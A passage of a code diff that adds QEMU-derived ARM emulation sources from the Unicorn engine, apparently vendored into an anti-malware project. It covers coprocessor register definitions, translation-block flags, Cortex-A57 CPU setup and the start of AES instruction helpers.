/* Location of register: coprocessor number and (crn,crm,opc1,opc2) + * tuple. Any of crm, opc1 and opc2 may be CP_ANY to indicate a + * 'wildcard' field -- any value of that field in the MRC/MCR insn + * will be decoded to this register. The register read and write + * callbacks will be passed an ARMCPRegInfo with the crn/crm/opc1/opc2 + * used by the program, so it is possible to register a wildcard and + * then behave differently on read/write if necessary. + * For 64 bit registers, only crm and opc1 are relevant; crn and opc2 + * must both be zero. + * For AArch64-visible registers, opc0 is also used. + * Since there are no "coprocessors" in AArch64, cp is purely used as a + * way to distinguish (for KVM's benefit) guest-visible system registers + * from demuxed ones provided to preserve the "no side effects on + * KVM register read/write from QEMU" semantics. cp==0x13 is guest + * visible (to match KVM's encoding); cp==0 will be converted to + * cp==0x13 when the ARMCPRegInfo is registered, for convenience. + */ + uint8_t cp; + uint8_t crn; + uint8_t crm; + uint8_t opc0; + uint8_t opc1; + uint8_t opc2; + /* Execution state in which this register is visible: ARM_CP_STATE_* */ + int state; + /* Register type: ARM_CP_* bits/values */ + int type; + /* Access rights: PL*_[RW] */ + int access; + /* The opaque pointer passed to define_arm_cp_regs_with_opaque() when + * this register was defined: can be used to hand data through to the + * register read/write functions, since they are passed the ARMCPRegInfo*. + */ + void *opaque; + /* Value of this register, if it is ARM_CP_CONST. Otherwise, if + * fieldoffset is non-zero, the reset value of the register. + */ + uint64_t resetvalue; + /* Offset of the field in CPUARMState for this register. This is not + * needed if either: + * 1. type is ARM_CP_CONST or one of the ARM_CP_SPECIALs + * 2. both readfn and writefn are specified + */ + ptrdiff_t fieldoffset; /* offsetof(CPUARMState, field) */ + /* Function for making any access checks for this register in addition to + * those specified by the 'access' permissions bits. If NULL, no extra + * checks required. The access check is performed at runtime, not at + * translate time. + */ + CPAccessFn *accessfn; + /* Function for handling reads of this register. If NULL, then reads + * will be done by loading from the offset into CPUARMState specified + * by fieldoffset. + */ + CPReadFn *readfn; + /* Function for handling writes of this register. If NULL, then writes + * will be done by writing to the offset into CPUARMState specified + * by fieldoffset. + */ + CPWriteFn *writefn; + /* Function for doing a "raw" read; used when we need to copy + * coprocessor state to the kernel for KVM or out for + * migration. This only needs to be provided if there is also a + * readfn and it has side effects (for instance clear-on-read bits). + */ + CPReadFn *raw_readfn; + /* Function for doing a "raw" write; used when we need to copy KVM + * kernel coprocessor state into userspace, or for inbound + * migration. This only needs to be provided if there is also a + * writefn and it masks out "unwritable" bits or has write-one-to-clear + * or similar behaviour. + */ + CPWriteFn *raw_writefn; + /* Function for resetting the register. If NULL, then reset will be done + * by writing resetvalue to the field specified in fieldoffset. If + * fieldoffset is 0 then no reset will be done. + */ + CPResetFn *resetfn; +}; + +/* Macros which are lvalues for the field in CPUARMState for the + * ARMCPRegInfo *ri. + */ +#define CPREG_FIELD32(env, ri) \ + (*(uint32_t *)((char *)(env) + (ri)->fieldoffset)) +#define CPREG_FIELD64(env, ri) \ + (*(uint64_t *)((char *)(env) + (ri)->fieldoffset)) + +#define REGINFO_SENTINEL { NULL, 0,0,0,0,0,0, 0, ARM_CP_SENTINEL, 0, NULL, 0,0,0,0,0,0,0,0, } + +void define_arm_cp_regs_with_opaque(ARMCPU *cpu, + const ARMCPRegInfo *regs, void *opaque); +void define_one_arm_cp_reg_with_opaque(ARMCPU *cpu, + const ARMCPRegInfo *regs, void *opaque); +static inline void define_arm_cp_regs(ARMCPU *cpu, const ARMCPRegInfo *regs) +{ + define_arm_cp_regs_with_opaque(cpu, regs, 0); +} +static inline void define_one_arm_cp_reg(ARMCPU *cpu, const ARMCPRegInfo *regs) +{ + define_one_arm_cp_reg_with_opaque(cpu, regs, 0); +} +const ARMCPRegInfo *get_arm_cp_reginfo(GHashTable *cpregs, uint32_t encoded_cp); + +/* CPWriteFn that can be used to implement writes-ignored behaviour */ +void arm_cp_write_ignore(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value); +/* CPReadFn that can be used for read-as-zero behaviour */ +uint64_t arm_cp_read_zero(CPUARMState *env, const ARMCPRegInfo *ri); + +/* CPResetFn that does nothing, for use if no reset is required even + * if fieldoffset is non zero. + */ +void arm_cp_reset_ignore(CPUARMState *env, const ARMCPRegInfo *opaque); + +/* Return true if this reginfo struct's field in the cpu state struct + * is 64 bits wide. + */ +static inline bool cpreg_field_is_64bit(const ARMCPRegInfo *ri) +{ + return (ri->state == ARM_CP_STATE_AA64) || (ri->type & ARM_CP_64BIT); +} + +static inline bool cp_access_ok(int current_el, + const ARMCPRegInfo *ri, int isread) +{ + return (ri->access >> ((current_el * 2) + isread)) & 1; +} + +/** + * write_list_to_cpustate + * @cpu: ARMCPU + * + * For each register listed in the ARMCPU cpreg_indexes list, write + * its value from the cpreg_values list into the ARMCPUState structure. + * This updates TCG's working data structures from KVM data or + * from incoming migration state. + * + * Returns: true if all register values were updated correctly, + * false if some register was unknown or could not be written. + * Note that we do not stop early on failure -- we will attempt + * writing all registers in the list. + */ +bool write_list_to_cpustate(ARMCPU *cpu); + +/** + * write_cpustate_to_list: + * @cpu: ARMCPU + * + * For each register listed in the ARMCPU cpreg_indexes list, write + * its value from the ARMCPUState structure into the cpreg_values list. + * This is used to copy info from TCG's working data structures into + * KVM or for outbound migration. + * + * Returns: true if all register values were read correctly, + * false if some register was unknown or could not be read. + * Note that we do not stop early on failure -- we will attempt + * reading all registers in the list. + */ +bool write_cpustate_to_list(ARMCPU *cpu); + +/* Does the core conform to the the "MicroController" profile. e.g. Cortex-M3. + Note the M in older cores (eg. ARM7TDMI) stands for Multiply. These are + conventional cores (ie. Application or Realtime profile). */ + +#define IS_M(env) arm_feature(env, ARM_FEATURE_M) + +#define ARM_CPUID_TI915T 0x54029152 +#define ARM_CPUID_TI925T 0x54029252 + +#if defined(CONFIG_USER_ONLY) +#define TARGET_PAGE_BITS 12 +#else +/* The ARM MMU allows 1k pages. */ +/* ??? Linux doesn't actually use these, and they're deprecated in recent + architecture revisions. Maybe a configure option to disable them. */ +#define TARGET_PAGE_BITS 10 +#endif + +#if defined(TARGET_AARCH64) +# define TARGET_PHYS_ADDR_SPACE_BITS 48 +# define TARGET_VIRT_ADDR_SPACE_BITS 64 +#else +# define TARGET_PHYS_ADDR_SPACE_BITS 40 +# define TARGET_VIRT_ADDR_SPACE_BITS 32 +#endif + +static inline bool arm_excp_unmasked(CPUState *cs, unsigned int excp_idx) +{ + CPUARMState *env = cs->env_ptr; + unsigned int cur_el = arm_current_el(env); + unsigned int target_el = arm_excp_target_el(cs, excp_idx); + /* FIXME: Use actual secure state. */ + bool secure = false; + /* If in EL1/0, Physical IRQ routing to EL2 only happens from NS state. */ + bool irq_can_hyp = !secure && cur_el < 2 && target_el == 2; + + /* Don't take exceptions if they target a lower EL. */ + if (cur_el > target_el) { + return false; + } + + switch (excp_idx) { + case EXCP_FIQ: + if (irq_can_hyp && (env->cp15.hcr_el2 & HCR_FMO)) { + return true; + } + return !(env->daif & PSTATE_F); + case EXCP_IRQ: + if (irq_can_hyp && (env->cp15.hcr_el2 & HCR_IMO)) { + return true; + } + return !(env->daif & PSTATE_I); + case EXCP_VFIQ: + if (secure || !(env->cp15.hcr_el2 & HCR_FMO)) { + /* VFIQs are only taken when hypervized and non-secure. */ + return false; + } + return !(env->daif & PSTATE_F); + case EXCP_VIRQ: + if (secure || !(env->cp15.hcr_el2 & HCR_IMO)) { + /* VIRQs are only taken when hypervized and non-secure. */ + return false; + } + return !(env->daif & PSTATE_I); + default: + g_assert_not_reached(); + return false; + } +} + +static inline CPUARMState *cpu_init(struct uc_struct *uc, const char *cpu_model) +{ + ARMCPU *cpu = cpu_arm_init(uc, cpu_model); + if (cpu) { + return &cpu->env; + } + return NULL; +} + +#ifdef TARGET_ARM +#define cpu_exec cpu_arm_exec +#define cpu_gen_code cpu_arm_gen_code +#define cpu_signal_handler cpu_arm_signal_handler +#define cpu_list arm_cpu_list +#endif + +/* MMU modes definitions */ +#define MMU_MODE0_SUFFIX _user +#define MMU_MODE1_SUFFIX _kernel +#define MMU_USER_IDX 0 +static inline int cpu_mmu_index (CPUARMState *env) +{ + return arm_current_el(env); +} + +/* Return the Exception Level targeted by debug exceptions; + * currently always EL1 since we don't implement EL2 or EL3. + */ +static inline int arm_debug_target_el(CPUARMState *env) +{ + return 1; +} + +static inline bool aa64_generate_debug_exceptions(CPUARMState *env) +{ + if (arm_current_el(env) == arm_debug_target_el(env)) { + if ((extract32(env->cp15.mdscr_el1, 13, 1) == 0) + || (env->daif & PSTATE_D)) { + return false; + } + } + return true; +} + +static inline bool aa32_generate_debug_exceptions(CPUARMState *env) +{ + if (arm_current_el(env) == 0 && arm_el_is_aa64(env, 1)) { + return aa64_generate_debug_exceptions(env); + } + return arm_current_el(env) != 2; +} + +/* Return true if debugging exceptions are currently enabled. + * This corresponds to what in ARM ARM pseudocode would be + * if UsingAArch32() then + * return AArch32.GenerateDebugExceptions() + * else + * return AArch64.GenerateDebugExceptions() + * We choose to push the if() down into this function for clarity, + * since the pseudocode has it at all callsites except for the one in + * CheckSoftwareStep(), where it is elided because both branches would + * always return the same value. + * + * Parts of the pseudocode relating to EL2 and EL3 are omitted because we + * don't yet implement those exception levels or their associated trap bits. + */ +static inline bool arm_generate_debug_exceptions(CPUARMState *env) +{ + if (env->aarch64) { + return aa64_generate_debug_exceptions(env); + } else { + return aa32_generate_debug_exceptions(env); + } +} + +/* Is single-stepping active? (Note that the "is EL_D AArch64?" check + * implicitly means this always returns false in pre-v8 CPUs.) + */ +static inline bool arm_singlestep_active(CPUARMState *env) +{ + return extract32(env->cp15.mdscr_el1, 0, 1) + && arm_el_is_aa64(env, arm_debug_target_el(env)) + && arm_generate_debug_exceptions(env); +} + +#include "exec/cpu-all.h" + +/* Bit usage in the TB flags field: bit 31 indicates whether we are + * in 32 or 64 bit mode. The meaning of the other bits depends on that. + */ +#define ARM_TBFLAG_AARCH64_STATE_SHIFT 31 +#define ARM_TBFLAG_AARCH64_STATE_MASK (1U << ARM_TBFLAG_AARCH64_STATE_SHIFT) + +/* Bit usage when in AArch32 state: */ +#define ARM_TBFLAG_THUMB_SHIFT 0 +#define ARM_TBFLAG_THUMB_MASK (1 << ARM_TBFLAG_THUMB_SHIFT) +#define ARM_TBFLAG_VECLEN_SHIFT 1 +#define ARM_TBFLAG_VECLEN_MASK (0x7 << ARM_TBFLAG_VECLEN_SHIFT) +#define ARM_TBFLAG_VECSTRIDE_SHIFT 4 +#define ARM_TBFLAG_VECSTRIDE_MASK (0x3 << ARM_TBFLAG_VECSTRIDE_SHIFT) +#define ARM_TBFLAG_PRIV_SHIFT 6 +#define ARM_TBFLAG_PRIV_MASK (1 << ARM_TBFLAG_PRIV_SHIFT) +#define ARM_TBFLAG_VFPEN_SHIFT 7 +#define ARM_TBFLAG_VFPEN_MASK (1 << ARM_TBFLAG_VFPEN_SHIFT) +#define ARM_TBFLAG_CONDEXEC_SHIFT 8 +#define ARM_TBFLAG_CONDEXEC_MASK (0xff << ARM_TBFLAG_CONDEXEC_SHIFT) +#define ARM_TBFLAG_BSWAP_CODE_SHIFT 16 +#define ARM_TBFLAG_BSWAP_CODE_MASK (1 << ARM_TBFLAG_BSWAP_CODE_SHIFT) +#define ARM_TBFLAG_CPACR_FPEN_SHIFT 17 +#define ARM_TBFLAG_CPACR_FPEN_MASK (1 << ARM_TBFLAG_CPACR_FPEN_SHIFT) +#define ARM_TBFLAG_SS_ACTIVE_SHIFT 18 +#define ARM_TBFLAG_SS_ACTIVE_MASK (1 << ARM_TBFLAG_SS_ACTIVE_SHIFT) +#define ARM_TBFLAG_PSTATE_SS_SHIFT 19 +#define ARM_TBFLAG_PSTATE_SS_MASK (1 << ARM_TBFLAG_PSTATE_SS_SHIFT) +/* We store the bottom two bits of the CPAR as TB flags and handle + * checks on the other bits at runtime + */ +#define ARM_TBFLAG_XSCALE_CPAR_SHIFT 20 +#define ARM_TBFLAG_XSCALE_CPAR_MASK (3 << ARM_TBFLAG_XSCALE_CPAR_SHIFT) + +/* Bit usage when in AArch64 state */ +#define ARM_TBFLAG_AA64_EL_SHIFT 0 +#define ARM_TBFLAG_AA64_EL_MASK (0x3 << ARM_TBFLAG_AA64_EL_SHIFT) +#define ARM_TBFLAG_AA64_FPEN_SHIFT 2 +#define ARM_TBFLAG_AA64_FPEN_MASK (1 << ARM_TBFLAG_AA64_FPEN_SHIFT) +#define ARM_TBFLAG_AA64_SS_ACTIVE_SHIFT 3 +#define ARM_TBFLAG_AA64_SS_ACTIVE_MASK (1 << ARM_TBFLAG_AA64_SS_ACTIVE_SHIFT) +#define ARM_TBFLAG_AA64_PSTATE_SS_SHIFT 4 +#define ARM_TBFLAG_AA64_PSTATE_SS_MASK (1 << ARM_TBFLAG_AA64_PSTATE_SS_SHIFT) + +/* some convenience accessor macros */ +#define ARM_TBFLAG_AARCH64_STATE(F) \ + (((F) & ARM_TBFLAG_AARCH64_STATE_MASK) >> ARM_TBFLAG_AARCH64_STATE_SHIFT) +#define ARM_TBFLAG_THUMB(F) \ + (((F) & ARM_TBFLAG_THUMB_MASK) >> ARM_TBFLAG_THUMB_SHIFT) +#define ARM_TBFLAG_VECLEN(F) \ + (((F) & ARM_TBFLAG_VECLEN_MASK) >> ARM_TBFLAG_VECLEN_SHIFT) +#define ARM_TBFLAG_VECSTRIDE(F) \ + (((F) & ARM_TBFLAG_VECSTRIDE_MASK) >> ARM_TBFLAG_VECSTRIDE_SHIFT) +#define ARM_TBFLAG_PRIV(F) \ + (((F) & ARM_TBFLAG_PRIV_MASK) >> ARM_TBFLAG_PRIV_SHIFT) +#define ARM_TBFLAG_VFPEN(F) \ + (((F) & ARM_TBFLAG_VFPEN_MASK) >> ARM_TBFLAG_VFPEN_SHIFT) +#define ARM_TBFLAG_CONDEXEC(F) \ + (((F) & ARM_TBFLAG_CONDEXEC_MASK) >> ARM_TBFLAG_CONDEXEC_SHIFT) +#define ARM_TBFLAG_BSWAP_CODE(F) \ + (((F) & ARM_TBFLAG_BSWAP_CODE_MASK) >> ARM_TBFLAG_BSWAP_CODE_SHIFT) +#define ARM_TBFLAG_CPACR_FPEN(F) \ + (((F) & ARM_TBFLAG_CPACR_FPEN_MASK) >> ARM_TBFLAG_CPACR_FPEN_SHIFT) +#define ARM_TBFLAG_SS_ACTIVE(F) \ + (((F) & ARM_TBFLAG_SS_ACTIVE_MASK) >> ARM_TBFLAG_SS_ACTIVE_SHIFT) +#define ARM_TBFLAG_PSTATE_SS(F) \ + (((F) & ARM_TBFLAG_PSTATE_SS_MASK) >> ARM_TBFLAG_PSTATE_SS_SHIFT) +#define ARM_TBFLAG_XSCALE_CPAR(F) \ + (((F) & ARM_TBFLAG_XSCALE_CPAR_MASK) >> ARM_TBFLAG_XSCALE_CPAR_SHIFT) +#define ARM_TBFLAG_AA64_EL(F) \ + (((F) & ARM_TBFLAG_AA64_EL_MASK) >> ARM_TBFLAG_AA64_EL_SHIFT) +#define ARM_TBFLAG_AA64_FPEN(F) \ + (((F) & ARM_TBFLAG_AA64_FPEN_MASK) >> ARM_TBFLAG_AA64_FPEN_SHIFT) +#define ARM_TBFLAG_AA64_SS_ACTIVE(F) \ + (((F) & ARM_TBFLAG_AA64_SS_ACTIVE_MASK) >> ARM_TBFLAG_AA64_SS_ACTIVE_SHIFT) +#define ARM_TBFLAG_AA64_PSTATE_SS(F) \ + (((F) & ARM_TBFLAG_AA64_PSTATE_SS_MASK) >> ARM_TBFLAG_AA64_PSTATE_SS_SHIFT) + +static inline void cpu_get_tb_cpu_state(CPUARMState *env, target_ulong *pc, + target_ulong *cs_base, int *flags) +{ + int fpen; + + if (arm_feature(env, ARM_FEATURE_V6)) { + fpen = extract32(env->cp15.c1_coproc, 20, 2); + } else { + /* CPACR doesn't exist before v6, so VFP is always accessible */ + fpen = 3; + } + + if (is_a64(env)) { + *pc = env->pc; + *flags = ARM_TBFLAG_AARCH64_STATE_MASK + | (arm_current_el(env) << ARM_TBFLAG_AA64_EL_SHIFT); + if (fpen == 3 || (fpen == 1 && arm_current_el(env) != 0)) { + *flags |= ARM_TBFLAG_AA64_FPEN_MASK; + } + /* The SS_ACTIVE and PSTATE_SS bits correspond to the state machine + * states defined in the ARM ARM for software singlestep: + * SS_ACTIVE PSTATE.SS State + * 0 x Inactive (the TB flag for SS is always 0) + * 1 0 Active-pending + * 1 1 Active-not-pending + */ + if (arm_singlestep_active(env)) { + *flags |= ARM_TBFLAG_AA64_SS_ACTIVE_MASK; + if (env->pstate & PSTATE_SS) { + *flags |= ARM_TBFLAG_AA64_PSTATE_SS_MASK; + } + } + } else { + int privmode; + *pc = env->regs[15]; + *flags = (env->thumb << ARM_TBFLAG_THUMB_SHIFT) + | (env->vfp.vec_len << ARM_TBFLAG_VECLEN_SHIFT) + | (env->vfp.vec_stride << ARM_TBFLAG_VECSTRIDE_SHIFT) + | (env->condexec_bits << ARM_TBFLAG_CONDEXEC_SHIFT) + | (env->bswap_code << ARM_TBFLAG_BSWAP_CODE_SHIFT); + if (arm_feature(env, ARM_FEATURE_M)) { + privmode = !((env->v7m.exception == 0) && (env->v7m.control & 1)); + } else { + privmode = (env->uncached_cpsr & CPSR_M) != ARM_CPU_MODE_USR; + } + if (privmode) { + *flags |= ARM_TBFLAG_PRIV_MASK; + } + if (env->vfp.xregs[ARM_VFP_FPEXC] & (1 << 30) + || arm_el_is_aa64(env, 1)) { + *flags |= ARM_TBFLAG_VFPEN_MASK; + } + if (fpen == 3 || (fpen == 1 && arm_current_el(env) != 0)) { + *flags |= ARM_TBFLAG_CPACR_FPEN_MASK; + } + /* The SS_ACTIVE and PSTATE_SS bits correspond to the state machine + * states defined in the ARM ARM for software singlestep: + * SS_ACTIVE PSTATE.SS State + * 0 x Inactive (the TB flag for SS is always 0) + * 1 0 Active-pending + * 1 1 Active-not-pending + */ + if (arm_singlestep_active(env)) { + *flags |= ARM_TBFLAG_SS_ACTIVE_MASK; + if (env->uncached_cpsr & PSTATE_SS) { + *flags |= ARM_TBFLAG_PSTATE_SS_MASK; + } + } + *flags |= (extract32(env->cp15.c15_cpar, 0, 2) + << ARM_TBFLAG_XSCALE_CPAR_SHIFT); + } + + *cs_base = 0; +} + +#include "exec/exec-all.h" + +static inline void cpu_pc_from_tb(CPUARMState *env, TranslationBlock *tb) +{ + if (ARM_TBFLAG_AARCH64_STATE(tb->flags)) { + env->pc = tb->pc; + } else { + env->regs[15] = tb->pc; + } +} + +enum { + QEMU_PSCI_CONDUIT_DISABLED = 0, + QEMU_PSCI_CONDUIT_SMC = 1, + QEMU_PSCI_CONDUIT_HVC = 2, +}; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu64.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu64.c new file mode 100644 index 0000000..30948ae --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/cpu64.c @@ -0,0 +1,224 @@ +/* + * QEMU AArch64 CPU + * + * Copyright (c) 2013 Linaro Ltd + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, see + * + */ + +#include "cpu.h" +#include "qemu-common.h" +#include "hw/arm/arm.h" +#include "sysemu/sysemu.h" + +static inline void set_feature(CPUARMState *env, int feature) +{ + env->features |= 1ULL << feature; +} + +#ifndef CONFIG_USER_ONLY +static uint64_t a57_l2ctlr_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + /* Number of processors is in [25:24]; otherwise we RAZ */ + return (smp_cpus - 1) << 24; +} +#endif + +static const ARMCPRegInfo cortexa57_cp_reginfo[] = { +#ifndef CONFIG_USER_ONLY + { "L2CTLR_EL1", 0,11,0, 3,1,2, ARM_CP_STATE_AA64, + 0, PL1_RW, NULL, 0, 0, + NULL, a57_l2ctlr_read, arm_cp_write_ignore, }, + { "L2CTLR", 15,9,0, 0,1,2, 0, + 0, PL1_RW, NULL, 0, 0, + NULL, a57_l2ctlr_read, arm_cp_write_ignore, }, +#endif + { "L2ECTLR_EL1", 0,11,0, 3,1,3, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + { "L2ECTLR", 15,9,0, 0,1,3, 0, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + { "L2ACTLR", 0,15,0, 3,1,0, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_RW, NULL, 0 }, + { "CPUACTLR_EL1", 0,15,2, 3,1,0, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_RW, NULL, 0 }, + { "CPUACTLR", 15,0,15, 0,0,0, 0, + ARM_CP_CONST | ARM_CP_64BIT, PL1_RW, NULL, 0, }, + { "CPUECTLR_EL1", 0,15,2, 3,1,1, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + { "CPUECTLR", 15,0,15, 0,1,0, 0, + ARM_CP_CONST | ARM_CP_64BIT, PL1_RW, NULL, 0, }, + { "CPUMERRSR_EL1", 0,15,2, 3,1,2, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_RW, NULL, 0 }, + { "CPUMERRSR", 15,0,15, 0,2,0, 0, + ARM_CP_CONST | ARM_CP_64BIT, PL1_RW, NULL, 0 }, + { "L2MERRSR_EL1", 0,15,2, 3,1,3, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_RW, NULL, 0 }, + { "L2MERRSR", 15,0,15, 0,3,0, 0, + ARM_CP_CONST | ARM_CP_64BIT, PL1_RW, NULL, 0 }, + REGINFO_SENTINEL +}; + +static void aarch64_a57_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + set_feature(&cpu->env, ARM_FEATURE_V8); + set_feature(&cpu->env, ARM_FEATURE_VFP4); + set_feature(&cpu->env, ARM_FEATURE_NEON); + set_feature(&cpu->env, ARM_FEATURE_GENERIC_TIMER); + set_feature(&cpu->env, ARM_FEATURE_AARCH64); + set_feature(&cpu->env, ARM_FEATURE_CBAR_RO); + set_feature(&cpu->env, ARM_FEATURE_V8_AES); + set_feature(&cpu->env, ARM_FEATURE_V8_SHA1); + set_feature(&cpu->env, ARM_FEATURE_V8_SHA256); + set_feature(&cpu->env, ARM_FEATURE_V8_PMULL); + set_feature(&cpu->env, ARM_FEATURE_CRC); + cpu->kvm_target = QEMU_KVM_ARM_TARGET_CORTEX_A57; + cpu->midr = 0x411fd070; + cpu->reset_fpsid = 0x41034070; + cpu->mvfr0 = 0x10110222; + cpu->mvfr1 = 0x12111111; + cpu->mvfr2 = 0x00000043; + cpu->ctr = 0x8444c004; + cpu->reset_sctlr = 0x00c50838; + cpu->id_pfr0 = 0x00000131; + cpu->id_pfr1 = 0x00011011; + cpu->id_dfr0 = 0x03010066; + cpu->id_afr0 = 0x00000000; + cpu->id_mmfr0 = 0x10101105; + cpu->id_mmfr1 = 0x40000000; + cpu->id_mmfr2 = 0x01260000; + cpu->id_mmfr3 = 0x02102211; + cpu->id_isar0 = 0x02101110; + cpu->id_isar1 = 0x13112111; + cpu->id_isar2 = 0x21232042; + cpu->id_isar3 = 0x01112131; + cpu->id_isar4 = 0x00011142; + cpu->id_isar5 = 0x00011121; + cpu->id_aa64pfr0 = 0x00002222; + cpu->id_aa64dfr0 = 0x10305106; + cpu->id_aa64isar0 = 0x00011120; + cpu->id_aa64mmfr0 = 0x00001124; + cpu->dbgdidr = 0x3516d000; + cpu->clidr = 0x0a200023; + cpu->ccsidr[0] = 0x701fe00a; /* 32KB L1 dcache */ + cpu->ccsidr[1] = 0x201fe012; /* 48KB L1 icache */ + cpu->ccsidr[2] = 0x70ffe07a; /* 2048KB L2 cache */ + cpu->dcz_blocksize = 4; /* 64 bytes */ + define_arm_cp_regs(cpu, cortexa57_cp_reginfo); +} + +#ifdef CONFIG_USER_ONLY +static void aarch64_any_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + ARMCPU *cpu = ARM_CPU(uc, obj); + + set_feature(&cpu->env, ARM_FEATURE_V8); + set_feature(&cpu->env, ARM_FEATURE_VFP4); + set_feature(&cpu->env, ARM_FEATURE_NEON); + set_feature(&cpu->env, ARM_FEATURE_AARCH64); + set_feature(&cpu->env, ARM_FEATURE_V8_AES); + set_feature(&cpu->env, ARM_FEATURE_V8_SHA1); + set_feature(&cpu->env, ARM_FEATURE_V8_SHA256); + set_feature(&cpu->env, ARM_FEATURE_V8_PMULL); + set_feature(&cpu->env, ARM_FEATURE_CRC); + cpu->ctr = 0x80038003; /* 32 byte I and D cacheline size, VIPT icache */ + cpu->dcz_blocksize = 7; /* 512 bytes */ +} +#endif + +typedef struct ARMCPUInfo { + const char *name; + void (*initfn)(struct uc_struct *uc, Object *obj, void *opaque); + void (*class_init)(struct uc_struct *uc, ObjectClass *oc, void *data); +} ARMCPUInfo; + +static const ARMCPUInfo aarch64_cpus[] = { + { "cortex-a57", aarch64_a57_initfn }, +#ifdef CONFIG_USER_ONLY + { "any", aarch64_any_initfn }, +#endif + { NULL } +}; + +static void aarch64_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ +} + +static void aarch64_cpu_finalizefn(struct uc_struct *uc, Object *obj, void *opaque) +{ +} + +static void aarch64_cpu_set_pc(CPUState *cs, vaddr value) +{ + //CPUARMState *env = cs->env_ptr; + ARMCPU *cpu = ARM_CPU(NULL, cs); + /* It's OK to look at env for the current mode here, because it's + * never possible for an AArch64 TB to chain to an AArch32 TB. + * (Otherwise we would need to use synchronize_from_tb instead.) + */ + if (is_a64(&cpu->env)) { + cpu->env.pc = value; + } else { + cpu->env.regs[15] = value; + } +} + +static void aarch64_cpu_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + CPUClass *cc = CPU_CLASS(uc, oc); + +#if !defined(CONFIG_USER_ONLY) + cc->do_interrupt = aarch64_cpu_do_interrupt; +#endif + cc->cpu_exec_interrupt = arm_cpu_exec_interrupt; + cc->set_pc = aarch64_cpu_set_pc; +} + +static void aarch64_cpu_register(struct uc_struct *uc, const ARMCPUInfo *info) +{ + TypeInfo type_info = { 0 }; + type_info.parent = TYPE_AARCH64_CPU; + type_info.instance_size = sizeof(ARMCPU); + type_info.instance_init = info->initfn; + type_info.class_size = sizeof(ARMCPUClass); + type_info.class_init = info->class_init; + + type_info.name = g_strdup_printf("%s-" TYPE_ARM_CPU, info->name); + type_register(uc, &type_info); + g_free((void *)type_info.name); +} + +void aarch64_cpu_register_types(void *opaque) +{ + const ARMCPUInfo *info = aarch64_cpus; + + static TypeInfo aarch64_cpu_type_info = { 0 }; + aarch64_cpu_type_info.name = TYPE_AARCH64_CPU; + aarch64_cpu_type_info.parent = TYPE_ARM_CPU; + aarch64_cpu_type_info.instance_size = sizeof(ARMCPU); + aarch64_cpu_type_info.instance_init = aarch64_cpu_initfn; + aarch64_cpu_type_info.instance_finalize = aarch64_cpu_finalizefn; + aarch64_cpu_type_info.abstract = true; + aarch64_cpu_type_info.class_size = sizeof(AArch64CPUClass); + aarch64_cpu_type_info.class_init = aarch64_cpu_class_init; + + type_register_static(opaque, &aarch64_cpu_type_info); + + while (info->name) { + aarch64_cpu_register(opaque, info); + info++; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/crypto_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/crypto_helper.c new file mode 100644 index 0000000..59988ed --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/crypto_helper.c @@ -0,0 +1,435 @@ +/* + * crypto_helper.c - emulate v8 Crypto Extensions instructions + * + * Copyright (C) 2013 - 2014 Linaro Ltd + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + */ + +#include + +#include "cpu.h" +#include "exec/exec-all.h" +#include "exec/helper-proto.h" +#include "qemu/aes.h" + +union CRYPTO_STATE { + uint8_t bytes[16]; + uint32_t words[4]; + uint64_t l[2]; +}; + +void HELPER(crypto_aese)(CPUARMState *env, uint32_t rd, uint32_t rm, + uint32_t decrypt) +{ + static uint8_t const * const sbox[2] = { AES_sbox, AES_isbox }; + static uint8_t const * const shift[2] = { AES_shifts, AES_ishifts }; + + union CRYPTO_STATE rk; + union CRYPTO_STATE st; + int i; + + rk.l[0] = float64_val(env->vfp.regs[rm]); + rk.l[1] = float64_val(env->vfp.regs[rm + 1]); + st.l[0] = float64_val(env->vfp.regs[rd]); + st.l[1] = float64_val(env->vfp.regs[rd + 1]); + + assert(decrypt < 2); + + /* xor state vector with round key */ + rk.l[0] ^= st.l[0]; + rk.l[1] ^= st.l[1]; + + /* combine ShiftRows operation and sbox substitution */ + for (i = 0; i < 16; i++) { + st.bytes[i] = sbox[decrypt][rk.bytes[shift[decrypt][i]]]; + } + + env->vfp.regs[rd] = make_float64(st.l[0]); + env->vfp.regs[rd + 1] = make_float64(st.l[1]); +} + +void HELPER(crypto_aesmc)(CPUARMState *env, uint32_t rd, uint32_t rm, + uint32_t decrypt) +{ + static uint32_t const mc[][256] = { { + /* MixColumns lookup table */ + 0x00000000, 0x03010102, 0x06020204, 0x05030306, + 0x0c040408, 0x0f05050a, 0x0a06060c, 0x0907070e, + 0x18080810, 0x1b090912, 0x1e0a0a14, 0x1d0b0b16, + 0x140c0c18, 0x170d0d1a, 0x120e0e1c, 0x110f0f1e, + 0x30101020, 0x33111122, 0x36121224, 0x35131326, + 0x3c141428, 0x3f15152a, 